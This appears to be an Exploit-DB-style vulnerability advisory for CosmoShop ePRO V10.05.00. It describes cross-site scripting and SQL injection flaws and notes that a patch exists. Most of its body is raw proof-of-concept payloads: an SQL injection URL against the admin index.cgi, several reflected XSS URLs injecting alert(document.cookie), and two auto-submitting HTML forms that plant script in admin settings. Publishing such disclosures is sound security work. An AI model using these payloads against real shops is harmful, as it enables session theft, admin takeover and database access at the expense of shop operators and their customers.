CosmoShop ePRO V10.05.00 Cross-Site Scripting and SQL Injection Vulnerabilities

vendor:

Cosmoshop ePRO

by:

SecurityFocus

7,5

CVSS

HIGH

Cross-Site Scripting and SQL Injection

79, 89

CWE

Product Name: Cosmoshop ePRO

Affected Version From: V10.05.00

Affected Version To: V10.05.00

Patch Exists: YES

Related CWE: N/A

CPE: a:cosmoshop:cosmoshop_epro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

CosmoShop ePRO V10.05.00 Cross-Site Scripting and SQL Injection Vulnerabilities

CosmoShop is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to execute unintended commands or access data that is not intended to be accessed.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46828/info

CosmoShop is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CosmoShop ePRO V10.05.00 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi-bin/admin/index.cgi?action=menu&id=eco'+SQL_CODE&hId=eco

<form action="http://www.example.com/cgi-bin/admin/edit_startseitentext.cgi" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="setup" value="allgemein">
<input type="hidden" name="action" value="save">
<input type="hidden" name="use_wwe" value="1">
<input type="hidden" name="file-de" value="startseitentext_de.txt">
<input type="hidden" name="text-de" value='page html"><script>alert(document.cookie)</script>'>
</form>
<script>
document.main.submit();
</script>

http://www.example.com/cgi-bin/admin/rubrikadmin.cgi?action=edit&rubnum=angebote&rcopy="><script>alert(document.cookie)</script>&expand=,angebote

http://www.example.com/cgi-bin/admin/artikeladmin.cgi?action=artikelsuche&typ=bearbeiten"><script>alert(document.cookie)</script>&hId=daten.artikel

http://www.example.com/cgi-bin/admin/shophilfe_suche.cgi?sprache=de&suchbegriff=1"><script>alert(document.cookie)</script>


<form action="http://www.example.com/cgi-bin/admin/setup_edit.cgi" method="post" name="main">

<input type="hidden" name="setup" value="allgemein">
<input type="hidden" name="hId" value="setup.einstellungen.allgemein">
<input type="hidden" name="setup_key" value="allgemein">
<input type="hidden" name="shoptitel" value="Cosmoshop Shopsoftware 10.x">
<input type="hidden" name="shopbetreiber" value="email@example.com">
<input type="hidden" name="shop_bestellempfaenger" value="email@example.com">
<input type="hidden" name="anfrage_mail" value="email@example.com">
<input type="hidden" name="shop_umstid" value="DE12345678">
<input type="hidden" name="shop_eg" value="1">
<input type="hidden" name="auftragszaehler" value="1">
<input type="hidden" name="hauptwaehrung" value='EUR"><script>alert(document.cookie)</script>'>
<input type="hidden" name="nebenwaehrung" value="$">
<input type="hidden" name="eurofaktor" value="0.7">
<input type="hidden" name="mindestpreisdm" value="10">
<input type="hidden" name="emis_bestellempfaenger" value="">
<input type="hidden" name="afs_bestellempfaenger" value="">
<input type="hidden" name="ean_in_ausf" value="1">
<input type="hidden" name="google_verify_code" value="">
<input type="hidden" name="save_it" value="abspeichern">

</form>
<script>
document.main.submit();
</script>